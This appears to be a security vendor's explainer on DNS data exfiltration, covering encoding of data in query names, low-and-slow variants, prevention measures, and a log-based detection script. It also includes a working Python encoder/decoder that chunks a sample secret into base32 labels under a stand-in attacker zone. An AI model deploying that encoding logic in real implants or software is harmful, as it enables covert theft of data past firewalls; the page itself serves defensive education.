
What Is DNS Data Exfiltration?

What is DNS data exfiltration?

DNS data exfiltration is a technique attackers use to steal data from an IT system or network by abusing the Domain Name System (DNS) protocol. In a DNS exfiltration attack, the attacker moves confidential or sensitive data out of a protected environment by encoding it inside DNS queries, most often as the labels of a hostname under a domain the attacker controls. Because DNS traffic is generally allowed through firewalls and other security controls with little inspection, the data hidden in DNS packets has a high chance of leaving the organization without triggering an alert. DNS data exfiltration is often one outcome of a DNS tunneling attack.

What is DNS?

DNS translates human-readable domain names such as website.com into IP addresses such as 2001:db8:3e8:2a3::b63 that computers use to reach each other. When a user enters a domain name into a web browser, the machine's stub resolver sends the query to a recursive resolver, which finds the answer by asking other nameservers in turn: a root nameserver, a top-level domain (TLD) nameserver, and finally the authoritative nameserver for the domain. If the recursive resolver has answered the same question recently, it serves the record from its cache instead. These lookups are routinely allowed through firewalls and are rarely monitored closely, which makes DNS an attractive channel for attackers who want to smuggle data out of a network.

How does DNS data exfiltration work?

In a DNS data exfiltration attack, the attacker first gets malware running inside the target network. This may be accomplished by getting a user inside the network to click on a link or visit a website that delivers malware to their machine. Attackers may also enter a network with stolen credentials and install the malware themselves. Once running, the malware acts as an implant that the attacker directs over a command and control (C2) channel, and it collects the data that is to be stolen.

The malware then encodes the stolen data and embeds it in DNS queries, typically as the labels of a long hostname under a domain the attacker controls (e.g., encodedstringofdata.attacker.example.com). The compromised host sends these queries to the organization's normal recursive resolver, which has no cached answer for the name and forwards the query through the DNS hierarchy to the authoritative nameserver for attacker.example.com. Because the resolver does the forwarding, the infected machine never needs a direct outbound connection to the attacker, and nothing crosses the firewall except ordinary-looking DNS. The attacker's authoritative nameserver logs each incoming query name, decodes the labels, and reassembles the data, and the transfer is complete.

How is stolen data embedded in DNS traffic?

Attackers use several techniques to carry data in DNS. The most common is to encode the data (typically in base32 or hexadecimal, because DNS names are case-insensitive and resolvers may alter letter case) and place it in the labels of the query name, as in the subdomain example above. A single label is limited to 63 bytes and a full name to 253 bytes, so the data is split into small chunks, each sent in its own query, usually with a sequence number so that the receiving server can reassemble chunks that arrive out of order. Data can also flow in the reverse direction in the resource record data of responses, for example in TXT, NULL, or CNAME records returned by the attacker's nameserver, which is how tunneling tools deliver commands to the implant. Less commonly, attackers pack a few bytes into header fields such as the 16-bit query ID; this yields very little bandwidth per packet but avoids conspicuously long names.
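The following Python script is an added example written for this page (not a tool the page describes) that plays out the two steps above: the implant side splits a constructed secret into base32 labels under the attacker's zone, respecting the 63-byte label and 253-byte name limits, and the attacker's nameserver side reassembles the data from logged query names that arrive in any order. The zone attacker.example.com, the sample secret and the name layout <seq>.<chunk>.<zone> are assumptions of the example; no DNS traffic is actually sent.

```python
import base64
import math

# RFC 1035 limits on the text form of a name: 63 bytes per label, 253 bytes in total.
MAX_LABEL = 63
MAX_NAME = 253

# Constructed stand-in for stolen data; any bytes would do.
SAMPLE_SECRET = b"user=jdoe;pass=Tr0ub4dor&3;card=4111111111111111;exp=12/29\n" * 2


def encode_chunks(data: bytes, zone: str, chunk_size: int = 30) -> list:
    """Implant side: split data into chunks and return one query name per chunk.

    Each name has the shape "<seq>.<base32 chunk>.<zone>". The sequence number lets
    the receiver reorder queries, since recursive resolvers may deliver them out of
    order or retry some of them. Base32 is used rather than base64 because DNS names
    are case-insensitive and resolvers may change letter case. A chunk_size that is
    a multiple of 5 keeps the base32 output free of "=" padding.
    """
    names = []
    for seq in range(math.ceil(len(data) / chunk_size)):
        chunk = data[seq * chunk_size:(seq + 1) * chunk_size]
        label = base64.b32encode(chunk).decode("ascii").rstrip("=").lower()
        name = f"{seq}.{label}.{zone}"
        if len(label) > MAX_LABEL or len(name) > MAX_NAME:
            raise ValueError("chunk_size too large for a DNS name")
        names.append(name)
    return names


def decode_queries(names, zone: str) -> bytes:
    """Attacker nameserver side: reassemble the data from logged query names.

    Names are accepted in any order; names that do not have the expected shape
    (the zone apex, ordinary lookups inside the zone) are ignored.
    """
    suffix = "." + zone.lower()
    pieces = {}
    for name in names:
        name = name.lower().rstrip(".")
        if not name.endswith(suffix):
            continue
        labels = name[:-len(suffix)].split(".")
        if len(labels) != 2 or not labels[0].isdigit():
            continue
        seq, label = int(labels[0]), labels[1].upper()
        # Restore the "=" padding stripped by the encoder (base32 works in groups of 8 chars).
        pieces[seq] = base64.b32decode(label + "=" * (-len(label) % 8))
    return b"".join(pieces[seq] for seq in sorted(pieces))


if __name__ == "__main__":
    zone = "attacker.example.com"  # the attacker's delegated zone, as in the text
    queries = encode_chunks(SAMPLE_SECRET, zone)
    for q in queries:
        print(q)
    # Simulate out-of-order arrival at the authoritative server.
    recovered = decode_queries(list(reversed(queries)), zone)
    assert recovered == SAMPLE_SECRET
    print(f"{len(SAMPLE_SECRET)} bytes moved in {len(queries)} queries")
```

Running the script prints the query names an implant would emit and confirms the round trip. Each printed name is a syntactically valid lookup that any resolver will forward; the only thing that distinguishes it from legitimate traffic is the shape of the name, which is what the detection approaches later on this page rely on.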

What is low-throughput data exfiltration?

Low-throughput data exfiltration is exfiltration carried out at a deliberately slow rate so that it blends into normal traffic and evades detection by network security products. DNS tunneling used for interactive access is usually high-throughput: it produces a noticeable jump in DNS query volume, long names, and unusual record types that volume-based monitoring can catch. In low-throughput exfiltration there is no such spike, because an infected endpoint may send a single query every few minutes or once an hour, each carrying a few dozen bytes. Spread over days or weeks that is still enough to leak credentials, keys, or a customer list, while the per-host query rate stays well inside normal limits. That makes this form of exfiltration extremely difficult to detect unless the content and diversity of query names are examined over a long window.

How can DNS data exfiltration be prevented?

IT teams can greatly reduce the risk of data exfiltration over DNS by following several security best practices.

  • Adopt a DNS security solution. DNS security solutions continually monitor resolver traffic and analyze DNS logs for indicators of exfiltration: unusually long or high-entropy query names, a high proportion of never-seen subdomains under a single domain, rare record types such as TXT or NULL, and queries to newly registered domains.
  • Ensure firewalls and proxies are correctly configured. Allow outbound DNS (port 53 over UDP and TCP, and DNS over TLS on port 853) only from the organization's own resolvers, block every other host from reaching external DNS servers directly, and control DNS over HTTPS so that clients cannot bypass the resolvers that are being monitored. This does not stop exfiltration through the sanctioned resolver, but it forces all DNS traffic through a point where it can be logged and inspected.
  • Enable rate limiting. Response rate limiting on DNS servers mitigates DNS floods and amplification attacks, which attackers sometimes use as a distraction while exfiltration is under way, and per-client query rate limits on resolvers cap how fast a high-throughput tunnel can move data.
  • Deploy DNS firewalls. A DNS firewall (for example, a resolver with response policy zones) inspects queries in real time and uses threat intelligence to refuse resolution of known malicious and newly registered domains, cutting off the channel before a query reaches the attacker's nameserver.
  • Optimize patching cadences. Keeping DNS servers and software up to date, and applying patches promptly, removes vulnerabilities that attackers may exploit to gain the initial access they need before exfiltrating data.
  • Implement security awareness training. Since human error is one of the most common contributors to successful attacks, security awareness training helps employees avoid the actions, such as opening a malicious link or attachment, that let attackers plant the malware that runs a DNS exfiltration campaign.
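To show the detection side for the low-throughput case described earlier and for the anomaly-based monitoring named in the first bullet above, here is an added Python example written for this page (not the algorithm of any product). It aggregates a constructed resolver log per registered domain and scores domains on the diversity, length and entropy of their query names rather than on query volume. The log format, IP addresses, domains (attacker.example uses the reserved .example TLD) and thresholds are all assumptions of the example.

```python
import base64
import hashlib
import math
from collections import Counter, defaultdict
from datetime import datetime


def _fake_chunk(i: int) -> str:
    """Stand-in for an encoded data chunk: 52 base32 characters derived from a hash."""
    digest = hashlib.sha256(b"chunk%d" % i).digest()
    return base64.b32encode(digest).decode("ascii").rstrip("=").lower()


# Constructed resolver log, one query per line: "<timestamp> <client> <qname> <qtype>".
# The format, hosts and domains are invented for this example.
SAMPLE_LOG = (
    # Normal browsing: 72 queries over 24 hours, but only two distinct names.
    [f"2024-05-01T{h:02d}:{m:02d}:00Z 10.0.0.5 {n}.example.org A"
     for h in range(24) for m, n in ((1, "www"), (20, "mail"), (40, "www"))]
    # CDN-style traffic: every name is unique, but the labels are short.
    + [f"2024-05-01T09:{m:02d}:30Z 10.0.0.7 i{m}.images.example.net A" for m in range(20)]
    # Low-and-slow exfiltration: one query every two hours, long high-entropy labels.
    + [f"2024-05-01T{2 * i:02d}:17:{(i * 7) % 60:02d}Z 10.0.0.5 {i}.{_fake_chunk(i)}.attacker.example TXT"
       for i in range(12)]
)


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s (0.0 for an empty string)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def registered_domain(qname: str) -> str:
    """Approximate the registered domain as the last two labels.

    Simplification for the example: production code should use the Public Suffix
    List so that names such as foo.co.uk are not collapsed to co.uk.
    """
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])


def domain_features(lines):
    """Aggregate, per registered domain, the features that expose an exfiltration channel."""
    acc = defaultdict(lambda: {"queries": 0, "names": set(), "prefix_len": 0,
                               "entropy": 0.0, "first": None, "last": None})
    for line in lines:
        ts, _client, qname, _qtype = line.split()
        t = datetime.fromisoformat(ts.replace("Z", "+00:00"))
        dom = registered_domain(qname)
        qname = qname.rstrip(".").lower()
        prefix = qname[:-len(dom) - 1] if qname.endswith("." + dom) else ""
        f = acc[dom]
        f["queries"] += 1
        f["names"].add(qname)
        f["prefix_len"] += len(prefix)
        f["entropy"] += shannon_entropy(prefix)
        f["first"] = t if f["first"] is None else min(f["first"], t)
        f["last"] = t if f["last"] is None else max(f["last"], t)
    result = {}
    for dom, f in acc.items():
        q = f["queries"]
        hours = max((f["last"] - f["first"]).total_seconds() / 3600, 1.0)
        result[dom] = {
            "queries": q,
            "queries_per_hour": q / hours,
            "unique_ratio": len(f["names"]) / q,    # share of queries carrying a never-seen name
            "avg_prefix_len": f["prefix_len"] / q,  # bytes of subdomain per query
            "avg_entropy": f["entropy"] / q,        # encoded data looks random
        }
    return result


def detect(lines, min_queries=8, min_unique_ratio=0.8, min_prefix_len=25, min_entropy=3.0):
    """Return (domain, features) pairs whose query names look like encoded data.

    No queries-per-hour threshold is used on purpose: a low-and-slow channel stays
    under any such limit, but over a long window its names are still almost all
    unique, long and high-entropy, which ordinary traffic (even CDN traffic) is not.
    """
    return [(dom, f) for dom, f in domain_features(lines).items()
            if f["queries"] >= min_queries and f["unique_ratio"] >= min_unique_ratio
            and f["avg_prefix_len"] >= min_prefix_len and f["avg_entropy"] >= min_entropy]


if __name__ == "__main__":
    for dom, f in sorted(domain_features(SAMPLE_LOG).items()):
        print(f"{dom:18} q={f['queries']:3} q/h={f['queries_per_hour']:5.2f} "
              f"unique={f['unique_ratio']:.2f} len={f['avg_prefix_len']:5.1f} H={f['avg_entropy']:.2f}")
    print("flagged:", [dom for dom, _ in detect(SAMPLE_LOG)])
```

With the sample log, a volume-only view is misleading: example.org produces 72 queries and attacker.example only 12, about one every two hours, yet only attacker.example is flagged. The thresholds need tuning per environment, and some legitimate services (CDNs, antivirus and reputation lookups that encode hashes in query names) also produce many unique, high-entropy names, so an allowlist of known services and Public Suffix List based domain extraction are needed before logic like this is used for alerting.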

Frequently Asked Questions (FAQ)

What kinds of data do attackers steal through DNS?
Cybercriminals often target sensitive data, such as financial records, customer information, and intellectual property.

Can DNS data exfiltration be prevented entirely?
While it is challenging to prevent every attempt, proactive measures such as routing all DNS through monitored resolvers and analyzing query logs can significantly reduce the risk.

Are small businesses at risk?
Yes, small businesses are not immune. Cybercriminals often target smaller entities because their security measures are relatively weaker.

How do I choose a DNS security solution?
Consult cybersecurity experts or vendors specializing in DNS security to find the solution that best fits your environment.

Have there been real incidents of DNS data exfiltration?
Yes, several high-profile breaches in recent years have involved data exfiltration over DNS, which highlights the severity of this threat.

Why customers choose Akamai

Akamai powers and protects life online. Leading companies worldwide choose Akamai to build, deliver, and secure their digital experiences — helping billions of people live, work, and play every day. Akamai Connected Cloud, a massively distributed edge and cloud platform, puts apps and experiences closer to users and keeps threats farther away.
